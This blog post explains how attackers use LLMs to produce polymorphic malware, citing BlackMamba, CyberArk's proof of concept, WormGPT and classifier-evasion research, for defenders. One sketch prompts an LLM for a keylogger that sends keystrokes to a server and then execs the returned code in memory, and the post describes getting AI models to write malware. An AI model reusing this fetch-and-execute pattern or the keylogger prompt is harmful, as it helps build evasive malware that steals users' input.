
We’re losing, but it can’t get any worse, right?

Attackers are using LLMs in many ways; how blind are you? We are spending hundreds of billions on cybersecurity and still losing trillions to attacks, and the structure of the industry is partially to blame. AI is here to help, right? Well, as others have pointed out, AI is being adopted more rapidly by attackers than by defenders. With that in mind, I decided to dive into the details. How are attackers using our favorite friends, the LLMs? And how is AI enabling more “living off the land” attacks that our existing systems are unable to discern?

In this series, I dive into five vectors being enhanced by LLMs. Each post explores why the technique is more effective now, refers to industry and academic research, and includes code examples to make it concrete for practitioners. This post examines the first vector: AI-Generated Polymorphic Malware. Subsequent posts will cover Obfuscated Command & Control Channels, AI-Recrafted “Frankenstein” Attacks, and AI-Enhanced Social Engineering & Phishing, before concluding the series by examining how these are all used in sophisticated “living off the land” TTPs and, on an optimistic note, briefly touching on the use of Collective Defense for Deep Learning.

Part 1: Polymorphic Malware – Shape-Shifting Attacks

“Polymorphic malware” refers to malicious code that changes its form to evade detection. Historically, malware authors achieved this through packers, obfuscators, or self-modifying code. Now, LLMs help attackers take polymorphism further, automating the generation of malware variants and even producing malicious payloads on the fly. As explained in this Dark Reading article, AI models can create malware that “contains no malicious code at all” until runtime, making it extremely hard to detect with signature-based or static analysis tools.
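For contrast with what follows, here is a minimal sketch of the classic, pre-LLM approach: a toy packer that XOR-encodes the same payload with a fresh random key on every build, so the bytes on disk differ even though the behavior is identical. The payload string and the build_variant helper are illustrative stand-ins, not taken from any real malware.

import os

PAYLOAD = b"print('payload logic would run here')"  # harmless stand-in for the real logic

def build_variant(payload: bytes) -> bytes:
    """Return a 'packed' variant: a fresh random XOR key prepended to the encoded payload."""
    key = os.urandom(16)
    encoded = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    return key + encoded

# Two builds of the same logic yield different bytes, hence different hashes and signatures.
variant_a = build_variant(PAYLOAD)
variant_b = build_variant(PAYLOAD)
print(variant_a != variant_b)  # True: identical behavior, no shared byte pattern on disk

AI-driven polymorphism goes a step further: instead of re-encoding fixed logic, the logic itself is rewritten each time.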

AI-Driven Polymorphism Explained

LLMs enable malware to evolve in real time, defeating security solutions that rely on known patterns. For example, researchers found OpenAI’s ChatGPT could write “highly advanced malware that contains no malicious code at all”, instead generating malicious functionality dynamically when needed. This means a malware file might appear benign to antivirus scanners and other signature-based approaches, only fetching or creating harmful code via an AI API at runtime. Security firm CyberArk demonstrated exactly this: using ChatGPT’s API from within malware to pull injection code and mutate it on demand. The result is cheap, easy “ChatGPT polymorphic malware” that poses “significant challenges for security professionals.” Each time the malware runs, the code it uses is freshly synthesized and unique, bypassing traditional signature detection.

Migo Kedem (follow this link for their LinkedIn), formerly of SentinelOne and now at CrowdStrike, introduces in an excellent blog a proof-of-concept called BlackMamba that anticipated this approach. BlackMamba is a polymorphic keylogger that uses a benign program to reach out to a cloud AI service, in this case OpenAI, at runtime; it then retrieves malicious code and executes it in memory. By pulling payloads from a trusted AI provider instead of a suspicious server, BlackMamba’s network traffic looks normal, as if the infected system were simply querying an AI model. And because the AI generates a new variant of the payload each time, no two infections look alike on disk.

BlackMamba was designed to defeat two approaches:

- Static signatures: Since the malware’s code is synthesized dynamically and differently for each run, file hashes and byte signatures are never the same twice. One BlackMamba sample might request the AI to produce a PowerShell snippet for keylogging, and another might get equivalent C# code: same behavior, completely different code (a minimal sketch of this follows after the list).
- Network detection: Instead of contacting an obvious command-and-control (C2) server, the malware talks to an API on openai.com, a domain unlikely to be blocked and generally considered safe; this could itself be considered living off the land, in that the malware is really just using OpenAI. The AI responses do not trip typical C2 pattern matching, since they resemble normal API traffic, and the content returned from OpenAI looks like innocuous text until executed.

Industry experts have taken note of this trend. In early 2023, Dark Reading warned that “ChatGPT could usher in a new dangerous wave of polymorphic malware.”
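To make the “never the same twice” point concrete, the sketch below hashes two behaviorally equivalent code variants. The generate_variant helper is a mocked stand-in for the kind of cloud AI call BlackMamba makes, so the example runs offline; with a real LLM, each response would differ in identifiers, structure, or even language.

import hashlib

def generate_variant(seed: int) -> str:
    """Mocked stand-in for an LLM call that returns functionally equivalent code each run.
    A real implementation would send a prompt to a cloud AI API and use the response."""
    variants = [
        "def collect(buf):\n    return ''.join(buf)",
        "def gather(items):\n    out = ''\n    for ch in items:\n        out += ch\n    return out",
    ]
    return variants[seed % len(variants)]

h1 = hashlib.sha256(generate_variant(0).encode()).hexdigest()
h2 = hashlib.sha256(generate_variant(1).encode()).hexdigest()
print("variant hashes match:", h1 == h2)  # False: same behavior, different bytes and hashes

Any defense keyed to the hash or byte pattern of one variant tells you nothing about the next one.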

Evidence of Polymorphic Malware

Concrete examples underscore why this technique is important:

- CyberArk’s Polymorphic Malware POC: CyberArk researchers used ChatGPT to generate malware that could morph itself. The AI produced code for each attack stage, creating injection code and continually mutating it. This experiment showed that even less-skilled threat actors could leverage an LLM to produce malware that evades EDR and AV.
- ChatGPT-Based Mutation Services: By mid-2023, underground forums began discussing and advertising custom AI models such as WormGPT and FraudGPT, fine-tuned for malicious tasks. These models allow attackers to bypass ChatGPT’s ethical filters and freely generate malware and malicious macros. Mandiant reported that North Korea’s APT43 even purchased access to WormGPT in 2023, indicating serious interest in AI-assisted malware development by nation-states.

This GitHub repository on the use of AI by attackers, started by Rachel James (follow the link to their LinkedIn), is one of the best resources I have found for tracking this emerging domain. Please add any pointers you’ve found below.

Code Example: Malware That Writes Itself Using an LLM

To illustrate how an attacker might implement this sort of polymorphic behavior, consider the following Python pseudo-code. The snippet uses an AI model to generate a malicious function at runtime and then executes it:

import openai  # hypothetical library/client for an AI API

# 1. Define a prompt that requests malicious code (e.g., a keylogger) from the LLM
prompt = (
    "You are a helpful coding assistant. Please provide a Python function called "
    "'steal_keystrokes' that reads pressed keys and sends them as base64 to a server. "
    "Do not include any explanations, just provide the code."
)

# 2. Call the LLM API to generate the code
response = openai.Completion.create(model="LLM-of-choice", prompt=prompt)
malicious_code = response["choices"][0]["text"]

# 3. For added polymorphism, mutate the code slightly (e.g., random variable names).
#    In practice, the malware could prompt the LLM again to obfuscate or rename identifiers.

# 4. Execute the generated code dynamically. The steal_keystrokes function now exists
#    only in memory; no static malicious code is ever written to disk.
exec(malicious_code)
steal_keystrokes()

Walking through it:

- Step 1: the malware crafts a prompt asking the LLM for a specific malicious function.
- Step 2: it gets back code, for example a function that uses keyboard hooks.
- Step 3: it executes that code within its own process.

Notice that the malicious logic (the steal_keystrokes function) never existed in the source code; it was created at runtime. The attacker can tweak the prompt or use a slightly different model each time the malware runs, yielding variations such as different function names, logic structure, encoding, and so on. This dynamic code generation defeats file-based detection and makes each instance unique. Such polymorphic techniques can also be combined with encryption or encoding: for example, the malware could ask the LLM to return the payload in base64, as shown above, or in another encoding, then decode and execute it, further obscuring the content from scanners (a small sketch of this wrinkle follows below).
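As a follow-on to that last point, here is a hedged sketch of the encoding wrinkle, with a harmless print statement standing in for generated code and fetch_encoded_payload as a hypothetical stand-in for the LLM call: nothing resembling executable logic is visible until the base64 text is decoded at runtime.

import base64

def fetch_encoded_payload() -> str:
    """Hypothetical stand-in for an LLM API call that returns its answer base64-encoded.
    A harmless snippet is used here in place of generated malicious code."""
    snippet = "print('decoded payload would execute here')"
    return base64.b64encode(snippet.encode()).decode()

encoded = fetch_encoded_payload()
# On disk and on the wire this is opaque text; only at runtime is it decoded and executed.
exec(base64.b64decode(encoded).decode())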

Why Traditional Security Struggles to Detect It

Conventional cybersecurity defenses are challenged on multiple fronts by AI-generated polymorphic malware:

- Signature Evasion: Signatures such as known byte patterns and YARA rules are ineffective when each malware instance is one of a kind. Even heuristic rules looking for certain code structures can be fooled, because an AI can implement the same behavior in novel ways. As one report put it, new variants “maintain the same behavior” while “almost always having a much lower malicious score” in scanners (thehackernews.com).
- Behavioral Detection Limits: Behavior-based monitoring, which typically looks for actions such as file encryption or suspicious process injection, is still useful. However, sophisticated AI malware might perform those actions in bursts or embed them in normal-looking processes. What is more, if the AI-generated code is fetched just in time, by the time the malicious action occurs it may be too late for preventative controls to react.
- Living-off-the-Land: Many AI-assisted attacks use legitimate tools and channels, such as the OpenAI API in our example, blending malicious actions with normal operations. Security tools that allow or ignore trusted processes, such as a signed binary making an outbound HTTPS connection, will not see anything suspicious about a call to an AI service. One key implication: beware of brittle telemetry, which cements your inability to see potentially malicious behavior, and think about how to future-proof your telemetry so it captures a broader set of signals. We have heard engineering teams in larger enterprises considering this as they invest in Snowflake, internal security data lakes, and telemetry-shaping systems such as Cribl or in-house equivalents.
- Volume and Speed: AI lets a single attacker quickly generate thousands of malware variants. This overwhelms defenders’ ability to triage alerts or produce counter-signatures, and we have seen behavior suggesting attackers are well aware of how this can overwhelm a SOC. The same approach also degrades traditional machine learning models: by flooding them with variants, attackers can confuse or evade them. As highlighted in this article (thehackernews.com), Palo Alto’s Unit 42 used an LLM to iteratively rewrite a known malicious script and managed to flip their own ML-based malware classifier’s verdict from malicious to benign 88% of the time (a rough sketch of this loop follows below).

Traditional defenses, which rely on catching known bad indicators or very overt violations of behavioral patterns, cannot keep up with this AI-fueled mutation cycle.
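A rough sketch of that mutation loop might look like the following, where llm_rewrite and classifier_score are hypothetical stand-ins (neither is a real API), not anything taken from the Unit 42 write-up.

def llm_rewrite(script: str) -> str:
    """Hypothetical stand-in for prompting an LLM to rewrite a script while
    preserving its behavior (renaming identifiers, restructuring logic, and so on)."""
    raise NotImplementedError  # placeholder, not a real API

def classifier_score(script: str) -> float:
    """Hypothetical stand-in for an ML-based malware classifier; higher means more malicious."""
    raise NotImplementedError  # placeholder, not a real API

def mutate_until_benign(script: str, threshold: float = 0.5, max_rounds: int = 20):
    """Iteratively rewrite the script until the classifier's verdict flips, or give up."""
    candidate = script
    for _ in range(max_rounds):
        if classifier_score(candidate) < threshold:
            return candidate  # verdict flipped: behaviorally unchanged, now scored benign
        candidate = llm_rewrite(candidate)
    return None

Each loop iteration costs the attacker little more than an API call, which is why the volume-and-speed point above matters.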

So, how bad can it be?

In a future post, I’ll talk about how and why DeepTempo and other approaches are being adopted to counter polymorphic attacks. In this post, I hope I have made the threat more real and shared some of the context we all need to counter it. Up next: in Part 2, I examine how attackers also use LLMs to better connect with Command and Control (C2) systems; I foreshadowed those techniques a bit in today’s blog. Please stay tuned and share any feedback you have on this post and the series. What else would you like to understand better? Am I going to the right level of depth? What am I misunderstanding or explaining poorly? Thank you for reading and for your suggestions.


We’re losing, but it can’t get any worse, right? was originally published in DeepTempo on Medium, where people are continuing the conversation by highlighting and responding to this story.

First seen on securityboulevard.com

Jump to article: securityboulevard.com/2025/03/were-losing-but-it-cant-get-any-worse-right/
